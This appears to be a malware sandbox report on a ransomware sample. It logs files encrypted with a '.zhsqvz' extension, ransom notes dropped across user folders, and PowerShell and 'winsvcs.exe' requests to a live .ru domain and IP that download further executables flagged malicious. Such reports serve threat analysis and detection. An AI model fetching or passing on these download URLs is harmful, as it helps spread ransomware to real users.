C:\Users\admin\AppData\Roaming\Microsoft\Crypto\RSA\S-1-5-21-1302019708-1500728564-335382590-1000\e3f86d7936454598ef98443d4fd3260d_90059c37-1320-41a4-b58d-2b75a9850d2f.zhsqvz
binary
MD5: ac3ec545c7fdad6a808ec9e254928165
SHA256: a716449d43e1a4423f8662e71fd6b0d5a3389b33f2cfafca2b5cf1cd4e61646f
2180
3468116065.exe
C:\Users\admin\AppData\Roaming\Microsoft\Document Building Blocks\1033\ZHSQVZ-DECRYPT.txt
text
MD5: f28c4e7d8fc6a81dbbe8f75c49b8257b
SHA256: 7366a68d646a504e3de2e2494c4494b848a05d53f5231720e017b01dcecd8c0d
2180
3468116065.exe
C:\Users\admin\AppData\Roaming\Microsoft\Crypto\RSA\S-1-5-21-1302019708-1500728564-335382590-1000\c43c9d3341c1ddc712bbe39db3c78fa5_90059c37-1320-41a4-b58d-2b75a9850d2f.zhsqvz
binary
MD5: c6be023ad948926f96152a8e721928cb
SHA256: 27a6267b9700033cbeb9a9684a618d858aa404e279042f14b82f31115a91f8c7
2180
3468116065.exe
C:\Users\admin\AppData\Roaming\Microsoft\Crypto\RSA\S-1-5-21-1302019708-1500728564-335382590-1000\7be1242ebc44e45985bd1ffa382e997c_90059c37-1320-41a4-b58d-2b75a9850d2f.zhsqvz
binary
MD5: a88e101c88a9359ffc5415d0ea6e192b
SHA256: d4f54377c49a3cca84131b7a9b3fcfc2cdc64419f7ff7d7e54a4c57b8629b1cf
2180
3468116065.exe
C:\Users\admin\AppData\Roaming\Microsoft\Crypto\RSA\S-1-5-21-1302019708-1500728564-335382590-1000\a551dda6b1d5ee0d0c4637af6c004413_90059c37-1320-41a4-b58d-2b75a9850d2f.zhsqvz
binary
MD5: 63d0747f8fa27acdc1bb5d7a7eb44511
SHA256: 31ab98eb6caee0988d50fdaf3566bc8ed9d5cf3695fc1fcc187d6d72f047965f
2180
3468116065.exe
C:\Users\admin\AppData\Roaming\Microsoft\Crypto\RSA\S-1-5-21-1302019708-1500728564-335382590-1000\e3f86d7936454598ef98443d4fd3260d_90059c37-1320-41a4-b58d-2b75a9850d2f
––
MD5:  ––
SHA256:  ––
2180
3468116065.exe
C:\Users\admin\AppData\Roaming\Microsoft\Crypto\RSA\S-1-5-21-1302019708-1500728564-335382590-1000\c43c9d3341c1ddc712bbe39db3c78fa5_90059c37-1320-41a4-b58d-2b75a9850d2f
––
MD5:  ––
SHA256:  ––
2180
3468116065.exe
C:\Users\admin\AppData\Roaming\Microsoft\Crypto\RSA\S-1-5-21-1302019708-1500728564-335382590-1000\a551dda6b1d5ee0d0c4637af6c004413_90059c37-1320-41a4-b58d-2b75a9850d2f
––
MD5:  ––
SHA256:  ––
2180
3468116065.exe
C:\Users\admin\AppData\Roaming\Microsoft\Crypto\RSA\S-1-5-21-1302019708-1500728564-335382590-1000\0f5007522459c86e95ffcc62f32308f1_90059c37-1320-41a4-b58d-2b75a9850d2f.zhsqvz
binary
MD5: 931844283d7a0ec43532109bab5fb40f
SHA256: 05a927d4f9c0e6b58fae73cd6c89a72d4a8d9aee22e43c93565e4e1fa404be0c
2180
3468116065.exe
C:\Users\admin\AppData\Roaming\Microsoft\Crypto\RSA\S-1-5-21-1302019708-1500728564-335382590-1000\ZHSQVZ-DECRYPT.txt
text
MD5: f28c4e7d8fc6a81dbbe8f75c49b8257b
SHA256: 7366a68d646a504e3de2e2494c4494b848a05d53f5231720e017b01dcecd8c0d
2180
3468116065.exe
C:\Users\admin\AppData\Roaming\Microsoft\Crypto\RSA\S-1-5-21-1302019708-1500728564-335382590-1000\1f91d2d17ea675d4c2c3192e241743f9_90059c37-1320-41a4-b58d-2b75a9850d2f.zhsqvz
binary
MD5: bb5d31c1e12455ac9e297cf61b718ad3
SHA256: 4de5d2cb90e0d59ba93c84520579842162f10651dfc41acfaae89f0221940f8e
2180
3468116065.exe
C:\Users\admin\AppData\Roaming\Microsoft\Crypto\RSA\S-1-5-21-1302019708-1500728564-335382590-1000\7be1242ebc44e45985bd1ffa382e997c_90059c37-1320-41a4-b58d-2b75a9850d2f
––
MD5:  ––
SHA256:  ––
2180
3468116065.exe
C:\Users\admin\AppData\Roaming\Microsoft\Crypto\RSA\S-1-5-21-1302019708-1500728564-335382590-1000\1f91d2d17ea675d4c2c3192e241743f9_90059c37-1320-41a4-b58d-2b75a9850d2f
––
MD5:  ––
SHA256:  ––
2180
3468116065.exe
C:\Users\admin\AppData\Roaming\Microsoft\Crypto\RSA\S-1-5-21-1302019708-1500728564-335382590-1000\0f5007522459c86e95ffcc62f32308f1_90059c37-1320-41a4-b58d-2b75a9850d2f
––
MD5:  ––
SHA256:  ––
2180
3468116065.exe
C:\Users\admin\AppData\Roaming\Microsoft\ZHSQVZ-DECRYPT.txt
text
MD5: f28c4e7d8fc6a81dbbe8f75c49b8257b
SHA256: 7366a68d646a504e3de2e2494c4494b848a05d53f5231720e017b01dcecd8c0d
2180
3468116065.exe
C:\Users\admin\AppData\Roaming\Identities\ZHSQVZ-DECRYPT.txt
text
MD5: f28c4e7d8fc6a81dbbe8f75c49b8257b
SHA256: 7366a68d646a504e3de2e2494c4494b848a05d53f5231720e017b01dcecd8c0d
2180
3468116065.exe
C:\Users\admin\AppData\Roaming\Microsoft\Credentials\ZHSQVZ-DECRYPT.txt
text
MD5: f28c4e7d8fc6a81dbbe8f75c49b8257b
SHA256: 7366a68d646a504e3de2e2494c4494b848a05d53f5231720e017b01dcecd8c0d
2180
3468116065.exe
C:\Users\admin\AppData\Roaming\Identities\{E4CE17A7-FC47-4CD1-8FF6-45436C8F45DB}\ZHSQVZ-DECRYPT.txt
text
MD5: f28c4e7d8fc6a81dbbe8f75c49b8257b
SHA256: 7366a68d646a504e3de2e2494c4494b848a05d53f5231720e017b01dcecd8c0d
2180
3468116065.exe
C:\Users\admin\AppData\Roaming\Microsoft\Crypto\RSA\ZHSQVZ-DECRYPT.txt
text
MD5: f28c4e7d8fc6a81dbbe8f75c49b8257b
SHA256: 7366a68d646a504e3de2e2494c4494b848a05d53f5231720e017b01dcecd8c0d
2180
3468116065.exe
C:\Users\admin\AppData\Roaming\Microsoft\AddIns\ZHSQVZ-DECRYPT.txt
text
MD5: f28c4e7d8fc6a81dbbe8f75c49b8257b
SHA256: 7366a68d646a504e3de2e2494c4494b848a05d53f5231720e017b01dcecd8c0d
2180
3468116065.exe
C:\Users\admin\AppData\Roaming\FileZilla\queue.sqlite3.zhsqvz
binary
MD5: dd44aff02eedd5597c197ce56dd7702e
SHA256: 3eb4cbf5ae4a90dbbc2f7766afcff7eb612285925e6e9a498f82b79ad07271e0
2180
3468116065.exe
C:\Users\admin\AppData\Roaming\Media Center Programs\ZHSQVZ-DECRYPT.txt
text
MD5: f28c4e7d8fc6a81dbbe8f75c49b8257b
SHA256: 7366a68d646a504e3de2e2494c4494b848a05d53f5231720e017b01dcecd8c0d
2180
3468116065.exe
C:\Users\admin\AppData\Roaming\Microsoft\Crypto\ZHSQVZ-DECRYPT.txt
text
MD5: f28c4e7d8fc6a81dbbe8f75c49b8257b
SHA256: 7366a68d646a504e3de2e2494c4494b848a05d53f5231720e017b01dcecd8c0d
2180
3468116065.exe
C:\Users\admin\AppData\Roaming\FileZilla\queue.sqlite3
––
MD5:  ––
SHA256:  ––
2180
3468116065.exe
C:\Users\admin\AppData\Roaming\FileZilla\ZHSQVZ-DECRYPT.txt
text
MD5: f28c4e7d8fc6a81dbbe8f75c49b8257b
SHA256: 7366a68d646a504e3de2e2494c4494b848a05d53f5231720e017b01dcecd8c0d
2180
3468116065.exe
C:\Users\admin\AppData\Roaming\FileZilla\layout.xml.zhsqvz
binary
MD5: 56a940106f9929aed4e962eebdbb796a
SHA256: 5997d22b188dd219bf1f2fe035dc940836514f63690aa95849764074ed7ba3e9
2180
3468116065.exe
C:\Users\admin\AppData\Roaming\FileZilla\filezilla.xml.zhsqvz
binary
MD5: 6e6862660a88b83cdd3cefd17b83eeac
SHA256: eca999d7c23b9bcec446ea8cc9b934c892e5a196b6b74947c608c4910266fb62
2180
3468116065.exe
C:\Users\admin\AppData\Roaming\Adobe\Sonar\Sonar1.0\sonar_policy.xml.zhsqvz
binary
MD5: 204b68bbd47e03a6ba96c895d218a7f6
SHA256: b964f1334541782fcae514f1be1d7fdc8bb48ba597a6794613ec52cb8a990505
2180
3468116065.exe
C:\Users\admin\AppData\Roaming\FileZilla\layout.xml
––
MD5:  ––
SHA256:  ––
2180
3468116065.exe
C:\Users\admin\AppData\Roaming\FileZilla\filezilla.xml
––
MD5:  ––
SHA256:  ––
2180
3468116065.exe
C:\Users\admin\AppData\Roaming\Adobe\Sonar\Sonar1.0\sonar_policy.xml
––
MD5:  ––
SHA256:  ––
2180
3468116065.exe
C:\Users\admin\AppData\Roaming\Adobe\LogTransport2\LogTransport2.cfg.zhsqvz
binary
MD5: 8cd2c64d28d1c6564480a5be21d40a5c
SHA256: 97b84a829c4f8cfb2fec3b12217c5c6abd8850b11c59043fa72fa8c62114d47d
2180
3468116065.exe
C:\Users\admin\AppData\Roaming\Adobe\Sonar\Sonar1.0\ZHSQVZ-DECRYPT.txt
text
MD5: f28c4e7d8fc6a81dbbe8f75c49b8257b
SHA256: 7366a68d646a504e3de2e2494c4494b848a05d53f5231720e017b01dcecd8c0d
2180
3468116065.exe
C:\Users\admin\AppData\Roaming\Adobe\Sonar\ZHSQVZ-DECRYPT.txt
text
MD5: f28c4e7d8fc6a81dbbe8f75c49b8257b
SHA256: 7366a68d646a504e3de2e2494c4494b848a05d53f5231720e017b01dcecd8c0d
2180
3468116065.exe
C:\Users\admin\AppData\Roaming\Adobe\LogTransport2\Logs\ulog_HeadlightsOptinProductFamily_HeadlightsOptinProduct_00000000-0000-0000-0000-000000000000_dc2ece58-8a8b-40bf-98c2-48039a3392bd.log.zhsqvz
binary
MD5: fc7b2c071820dad7df72f1e1389f3272
SHA256: 66a379ecc33b59258d8cf67f18a260e40d1a97aca8bab15715bbcae78c1a036f
2180
3468116065.exe
C:\Users\admin\AppData\Roaming\Adobe\LogTransport2\LogTransport2.cfg
––
MD5:  ––
SHA256:  ––
2180
3468116065.exe
C:\Users\admin\AppData\Roaming\Adobe\LogTransport2\Logs\ulog_HeadlightsOptinProductFamily_HeadlightsOptinProduct_00000000-0000-0000-0000-000000000000_dc2ece58-8a8b-40bf-98c2-48039a3392bd.log
––
MD5:  ––
SHA256:  ––
2180
3468116065.exe
C:\Users\admin\AppData\Roaming\Adobe\LogTransport2\Logs\ZHSQVZ-DECRYPT.txt
text
MD5: f28c4e7d8fc6a81dbbe8f75c49b8257b
SHA256: 7366a68d646a504e3de2e2494c4494b848a05d53f5231720e017b01dcecd8c0d
2180
3468116065.exe
C:\Users\admin\AppData\Roaming\Adobe\LogTransport2\Logs\ulog_AcroARM2_Reader_2274f67c-7a7f-45e3-a23e-aa35d5b91e00_02f147fa-0489-4885-b993-ed9936fcacc0_0.rdy.zhsqvz
binary
MD5: 9e34a5c067c9fd66496ec91b37272333
SHA256: 1fa35ed4726d63b3fb337741ce1f603433847b387004fad5e3e8e73daa2a1152
2180
3468116065.exe
C:\Users\admin\AppData\Roaming\Adobe\Linguistics\ZHSQVZ-DECRYPT.txt
text
MD5: f28c4e7d8fc6a81dbbe8f75c49b8257b
SHA256: 7366a68d646a504e3de2e2494c4494b848a05d53f5231720e017b01dcecd8c0d
2180
3468116065.exe
C:\Users\admin\AppData\Roaming\Adobe\LogTransport2\ZHSQVZ-DECRYPT.txt
text
MD5: f28c4e7d8fc6a81dbbe8f75c49b8257b
SHA256: 7366a68d646a504e3de2e2494c4494b848a05d53f5231720e017b01dcecd8c0d
2180
3468116065.exe
C:\Users\admin\AppData\Roaming\Adobe\LogTransport2\Logs\ulog_AcroARM2_ARM2Update_2274f67c-7a7f-45e3-a23e-aa35d5b91e00_fea03e67-af51-4fcb-b57f-c238867edb9b_0.log.zhsqvz
binary
MD5: bd337244df7e61772cec9a6fb2f02748
SHA256: c3c362ca2171d3c5ab813c21e4dd760cd42fc81b1510e89f6e30d4fd14634fbd
2180
3468116065.exe
C:\Users\admin\AppData\Roaming\Adobe\LogTransport2\Logs\ulog_AcroARM2_Reader_2274f67c-7a7f-45e3-a23e-aa35d5b91e00_02f147fa-0489-4885-b993-ed9936fcacc0_0.rdy
––
MD5:  ––
SHA256:  ––
2180
3468116065.exe
C:\Users\admin\AppData\Roaming\Adobe\LogTransport2\Logs\ulog_AcroARM2_ARM2Update_2274f67c-7a7f-45e3-a23e-aa35d5b91e00_fea03e67-af51-4fcb-b57f-c238867edb9b_0.log
––
MD5:  ––
SHA256:  ––
2180
3468116065.exe
C:\Users\admin\AppData\Roaming\Adobe\Flash Player\NativeCache\ZHSQVZ-DECRYPT.txt
text
MD5: f28c4e7d8fc6a81dbbe8f75c49b8257b
SHA256: 7366a68d646a504e3de2e2494c4494b848a05d53f5231720e017b01dcecd8c0d
2180
3468116065.exe
C:\Users\admin\AppData\Roaming\Adobe\Acrobat\DC\Security\CRLCache\CE338828149963DCEA4CD26BB86F0363B4CA0BA5.crl.zhsqvz
binary
MD5: 61ffab150acf9ddd03389aa5a280e016
SHA256: c0b9195d3712b9f62a0772fd9d4ce8faefd6dd577d7187974f0688401a229579
2180
3468116065.exe
C:\Users\admin\AppData\Roaming\Adobe\Flash Player\AssetCache\J7D4H966\ZHSQVZ-DECRYPT.txt
text
MD5: f28c4e7d8fc6a81dbbe8f75c49b8257b
SHA256: 7366a68d646a504e3de2e2494c4494b848a05d53f5231720e017b01dcecd8c0d
2180
3468116065.exe
C:\Users\admin\AppData\Roaming\Adobe\Flash Player\AssetCache\ZHSQVZ-DECRYPT.txt
text
MD5: f28c4e7d8fc6a81dbbe8f75c49b8257b
SHA256: 7366a68d646a504e3de2e2494c4494b848a05d53f5231720e017b01dcecd8c0d
2180
3468116065.exe
C:\Users\admin\AppData\Roaming\Adobe\Acrobat\DC\Security\CRLCache\0FDED5CEB68C302B1CDB2BDDD9D0000E76539CB0.crl.zhsqvz
binary
MD5: 466bff6d0ee53c7074e3fb950427b0ca
SHA256: 3f6f55c967abda873e4152dbd8891a638c2875cfe22f7aae6a3135330c9fd97a
2180
3468116065.exe
C:\Users\admin\AppData\Roaming\Adobe\Headlights\ZHSQVZ-DECRYPT.txt
text
MD5: f28c4e7d8fc6a81dbbe8f75c49b8257b
SHA256: 7366a68d646a504e3de2e2494c4494b848a05d53f5231720e017b01dcecd8c0d
2180
3468116065.exe
C:\Users\admin\AppData\Roaming\Adobe\Flash Player\ZHSQVZ-DECRYPT.txt
text
MD5: f28c4e7d8fc6a81dbbe8f75c49b8257b
SHA256: 7366a68d646a504e3de2e2494c4494b848a05d53f5231720e017b01dcecd8c0d
2180
3468116065.exe
C:\Users\admin\AppData\Roaming\Adobe\Acrobat\DC\Security\CRLCache\ZHSQVZ-DECRYPT.txt
text
MD5: f28c4e7d8fc6a81dbbe8f75c49b8257b
SHA256: 7366a68d646a504e3de2e2494c4494b848a05d53f5231720e017b01dcecd8c0d
2180
3468116065.exe
C:\Users\admin\AppData\Roaming\Adobe\Acrobat\DC\Security\CRLCache\CE338828149963DCEA4CD26BB86F0363B4CA0BA5.crl
––
MD5:  ––
SHA256:  ––
2180
3468116065.exe
C:\Users\admin\AppData\Roaming\Adobe\Acrobat\DC\Security\CRLCache\0FDED5CEB68C302B1CDB2BDDD9D0000E76539CB0.crl
––
MD5:  ––
SHA256:  ––
2180
3468116065.exe
C:\Users\admin\AppData\Roaming\Adobe\Acrobat\DC\JSCache\GlobData.zhsqvz
binary
MD5: 74648c23e6c301a7c537d52c0c670855
SHA256: 6351d3ecf03294129476bca1de9ef1d03aed9e4c7f0751a16e2a91fd95771f40
2180
3468116065.exe
C:\Users\admin\AppData\Roaming\Adobe\Acrobat\DC\Security\addressbook.acrodata.zhsqvz
binary
MD5: 4543ec67d1fb54b9dce5c81de709a1f5
SHA256: 721f7ce64e714b803b0b9fe93477bb0a10726de9aede17fb653f08ccfb8dd82b
2180
3468116065.exe
C:\Users\admin\AppData\Roaming\Adobe\Acrobat\DC\Security\ZHSQVZ-DECRYPT.txt
text
MD5: f28c4e7d8fc6a81dbbe8f75c49b8257b
SHA256: 7366a68d646a504e3de2e2494c4494b848a05d53f5231720e017b01dcecd8c0d
2180
3468116065.exe
C:\Users\admin\AppData\Roaming\Adobe\Acrobat\DC\JSCache\GlobSettings.zhsqvz
binary
MD5: 2d4070ed8809b16b24f62e81214ce45f
SHA256: 0cf3294e25d3f4d8a270259a2b95f874d754cbf9177c450a01d55ea4f57caa36
2180
3468116065.exe
C:\Users\admin\AppData\Roaming\Adobe\Acrobat\DC\Security\addressbook.acrodata
––
MD5:  ––
SHA256:  ––
2180
3468116065.exe
C:\Users\admin\AppData\Roaming\Adobe\Acrobat\DC\JSCache\GlobSettings
––
MD5:  ––
SHA256:  ––
2180
3468116065.exe
C:\Users\admin\AppData\Roaming\Adobe\Acrobat\DC\JSCache\GlobData
––
MD5:  ––
SHA256:  ––
2180
3468116065.exe
C:\Users\admin\AppData\Roaming\ZHSQVZ-DECRYPT.txt
text
MD5: f28c4e7d8fc6a81dbbe8f75c49b8257b
SHA256: 7366a68d646a504e3de2e2494c4494b848a05d53f5231720e017b01dcecd8c0d
2180
3468116065.exe
C:\Users\admin\657607470096780\ZHSQVZ-DECRYPT.txt
text
MD5: f28c4e7d8fc6a81dbbe8f75c49b8257b
SHA256: 7366a68d646a504e3de2e2494c4494b848a05d53f5231720e017b01dcecd8c0d
2180
3468116065.exe
C:\Users\admin\.oracle_jre_usage\90737d32e3abaa4.timestamp.zhsqvz
binary
MD5: 7ca8b3c45f8b49654cfb843779a27be4
SHA256: 3f39c870467c3676067bb89c3fb6ee8edb954713d218dec81d2362ab452f67a4
2180
3468116065.exe
C:\Users\admin\AppData\Roaming\Adobe\Acrobat\DC\Forms\ZHSQVZ-DECRYPT.txt
text
MD5: f28c4e7d8fc6a81dbbe8f75c49b8257b
SHA256: 7366a68d646a504e3de2e2494c4494b848a05d53f5231720e017b01dcecd8c0d
2180
3468116065.exe
C:\Users\admin\AppData\Roaming\Adobe\Acrobat\DC\Collab\ZHSQVZ-DECRYPT.txt
text
MD5: f28c4e7d8fc6a81dbbe8f75c49b8257b
SHA256: 7366a68d646a504e3de2e2494c4494b848a05d53f5231720e017b01dcecd8c0d
2180
3468116065.exe
C:\Users\admin\AppData\ZHSQVZ-DECRYPT.txt
text
MD5: f28c4e7d8fc6a81dbbe8f75c49b8257b
SHA256: 7366a68d646a504e3de2e2494c4494b848a05d53f5231720e017b01dcecd8c0d
2180
3468116065.exe
C:\Users\admin\495030305060\ZHSQVZ-DECRYPT.txt
text
MD5: f28c4e7d8fc6a81dbbe8f75c49b8257b
SHA256: 7366a68d646a504e3de2e2494c4494b848a05d53f5231720e017b01dcecd8c0d
2180
3468116065.exe
C:\Users\admin\AppData\Roaming\Adobe\Acrobat\DC\JSCache\ZHSQVZ-DECRYPT.txt
text
MD5: f28c4e7d8fc6a81dbbe8f75c49b8257b
SHA256: 7366a68d646a504e3de2e2494c4494b848a05d53f5231720e017b01dcecd8c0d
2180
3468116065.exe
C:\Users\admin\AppData\Roaming\Adobe\Acrobat\ZHSQVZ-DECRYPT.txt
text
MD5: f28c4e7d8fc6a81dbbe8f75c49b8257b
SHA256: 7366a68d646a504e3de2e2494c4494b848a05d53f5231720e017b01dcecd8c0d
2180
3468116065.exe
C:\Users\admin\AppData\Roaming\Adobe\Acrobat\DC\ZHSQVZ-DECRYPT.txt
text
MD5: f28c4e7d8fc6a81dbbe8f75c49b8257b
SHA256: 7366a68d646a504e3de2e2494c4494b848a05d53f5231720e017b01dcecd8c0d
2180
3468116065.exe
C:\Users\admin\4950606094303050\ZHSQVZ-DECRYPT.txt
text
MD5: f28c4e7d8fc6a81dbbe8f75c49b8257b
SHA256: 7366a68d646a504e3de2e2494c4494b848a05d53f5231720e017b01dcecd8c0d
2180
3468116065.exe
C:\Users\admin\AppData\Roaming\Adobe\ZHSQVZ-DECRYPT.txt
text
MD5: f28c4e7d8fc6a81dbbe8f75c49b8257b
SHA256: 7366a68d646a504e3de2e2494c4494b848a05d53f5231720e017b01dcecd8c0d
2180
3468116065.exe
C:\Users\admin\.oracle_jre_usage\ZHSQVZ-DECRYPT.txt
text
MD5: f28c4e7d8fc6a81dbbe8f75c49b8257b
SHA256: 7366a68d646a504e3de2e2494c4494b848a05d53f5231720e017b01dcecd8c0d
2180
3468116065.exe
C:\Users\admin\ZHSQVZ-DECRYPT.txt
text
MD5: f28c4e7d8fc6a81dbbe8f75c49b8257b
SHA256: 7366a68d646a504e3de2e2494c4494b848a05d53f5231720e017b01dcecd8c0d
2180
3468116065.exe
C:\Users\admin\AppData\Local\VirtualStore\Program Files\ZHSQVZ-DECRYPT.txt
text
MD5: f28c4e7d8fc6a81dbbe8f75c49b8257b
SHA256: 7366a68d646a504e3de2e2494c4494b848a05d53f5231720e017b01dcecd8c0d
2180
3468116065.exe
C:\Users\admin\.oracle_jre_usage\90737d32e3abaa4.timestamp
––
MD5:  ––
SHA256:  ––
2180
3468116065.exe
C:\$Recycle.Bin\S-1-5-21-1302019708-1500728564-335382590-1000\ZHSQVZ-DECRYPT.txt
text
MD5: f28c4e7d8fc6a81dbbe8f75c49b8257b
SHA256: 7366a68d646a504e3de2e2494c4494b848a05d53f5231720e017b01dcecd8c0d
2180
3468116065.exe
C:\Users\admin\AppData\Local\VirtualStore\ZHSQVZ-DECRYPT.txt
text
MD5: f28c4e7d8fc6a81dbbe8f75c49b8257b
SHA256: 7366a68d646a504e3de2e2494c4494b848a05d53f5231720e017b01dcecd8c0d
2180
3468116065.exe
C:\Users\Public\Videos\Sample Videos\Wildlife.wmv.zhsqvz
––
MD5:  ––
SHA256:  ––
2180
3468116065.exe
C:\Users\Public\Videos\Sample Videos\ZHSQVZ-DECRYPT.txt
text
MD5: f28c4e7d8fc6a81dbbe8f75c49b8257b
SHA256: 7366a68d646a504e3de2e2494c4494b848a05d53f5231720e017b01dcecd8c0d
2180
3468116065.exe
C:\Users\Public\Recorded TV\Sample Media\win7_scenic-demoshort_raw.wtv.zhsqvz
––
MD5:  ––
SHA256:  ––
2180
3468116065.exe
C:\Users\Public\Recorded TV\Sample Media\win7_scenic-demoshort_raw.wtv
––
MD5:  ––
SHA256:  ––
2180
3468116065.exe
C:\Users\Public\Recorded TV\ZHSQVZ-DECRYPT.txt
text
MD5: f28c4e7d8fc6a81dbbe8f75c49b8257b
SHA256: 7366a68d646a504e3de2e2494c4494b848a05d53f5231720e017b01dcecd8c0d
2180
3468116065.exe
C:\Users\Public\Recorded TV\Sample Media\ZHSQVZ-DECRYPT.txt
text
MD5: f28c4e7d8fc6a81dbbe8f75c49b8257b
SHA256: 7366a68d646a504e3de2e2494c4494b848a05d53f5231720e017b01dcecd8c0d
2180
3468116065.exe
C:\Users\Public\Pictures\Sample Pictures\Tulips.jpg.zhsqvz
binary
MD5: b3a3e2ebb3950e5ffaa8872d122bfab7
SHA256: 72f4088115b0ff502d27b31284058ac5edace1827625a274feb82b4a9e69cf1a
2180
3468116065.exe
C:\Users\Public\Pictures\Sample Pictures\Tulips.jpg
––
MD5:  ––
SHA256:  ––
2180
3468116065.exe
C:\Users\Public\Pictures\Sample Pictures\Penguins.jpg.zhsqvz
binary
MD5: 880ea90897a0c2f6a4cc488b10d5f0fe
SHA256: 00090f752020c641b600acc28a9df0fccc81015b2830e6dc19e2a9aab50493d0
2180
3468116065.exe
C:\Users\Public\Pictures\Sample Pictures\Penguins.jpg
––
MD5:  ––
SHA256:  ––
3784
powershell.exe
C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms
binary
MD5: 901ecdf767744e6bb59cb023757886e3
SHA256: 48a990a7b1201bfd70f417698302a6299d036a6574e558a96000af48469479e1
3784
powershell.exe
C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms~RF19dda4.TMP
binary
MD5: 901ecdf767744e6bb59cb023757886e3
SHA256: 48a990a7b1201bfd70f417698302a6299d036a6574e558a96000af48469479e1
3784
powershell.exe
C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\AZEBQKZNSY4ZRULWIKZ7.temp
––
MD5:  ––
SHA256:  ––
2180
3468116065.exe
C:\Users\Public\Videos\Sample Videos\Wildlife.wmv
––
MD5:  ––
SHA256:  ––

Find more information of the staic content and download it at the full report

Network activity

HTTP(S) requests
49
TCP/UDP connections
32
DNS requests
16
Threats
66

HTTP requests

PID Process Method HTTP Code IP URL CN Type Size Reputation
–– –– HEAD 200 92.63.197.48:80 http://slpsrgpsrhojifdij.ru/krablin.exe RU
––
––
malicious
3784 powershell.exe GET 200 92.63.197.48:80 http://slpsrgpsrhojifdij.ru/krablin.exe RU
executable
malicious
–– –– GET 206 92.63.197.48:80 http://slpsrgpsrhojifdij.ru/krablin.exe RU
executable
malicious
–– –– GET 206 92.63.197.48:80 http://slpsrgpsrhojifdij.ru/krablin.exe RU
binary
malicious
–– –– GET 206 92.63.197.48:80 http://slpsrgpsrhojifdij.ru/krablin.exe RU
abr
malicious
–– –– GET 206 92.63.197.48:80 http://slpsrgpsrhojifdij.ru/krablin.exe RU
abr
malicious
2648 winsvcs.exe GET –– 92.63.197.48:80 http://slpsrgpsrhojifdij.ru/1.exe RU
––
––
malicious
2648 winsvcs.exe GET 200 92.63.197.48:80 http://slpsrgpsrhojifdij.ru/1.exe RU
executable
malicious
2648 winsvcs.exe GET –– 92.63.197.48:80 http://slpsrgpsrhojifdij.ru/2.exe RU
––
––
malicious
2648 winsvcs.exe GET 200 92.63.197.48:80 http://slpsrgpsrhojifdij.ru/2.exe RU
executable
malicious
2648 winsvcs.exe GET 404 92.63.197.48:80 http://slpsrgpsrhojifdij.ru/3.exe RU
html
malicious
2648 winsvcs.exe GET 404 92.63.197.48:80 http://slpsrgpsrhojifdij.ru/4.exe RU
html
malicious
2648 winsvcs.exe GET 404 92.63.197.48:80 http://slpsrgpsrhojifdij.ru/5.exe RU
html
malicious
2648 winsvcs.exe GET –– 92.63.197.48:80 http://92.63.197.48/m/1.exe RU
––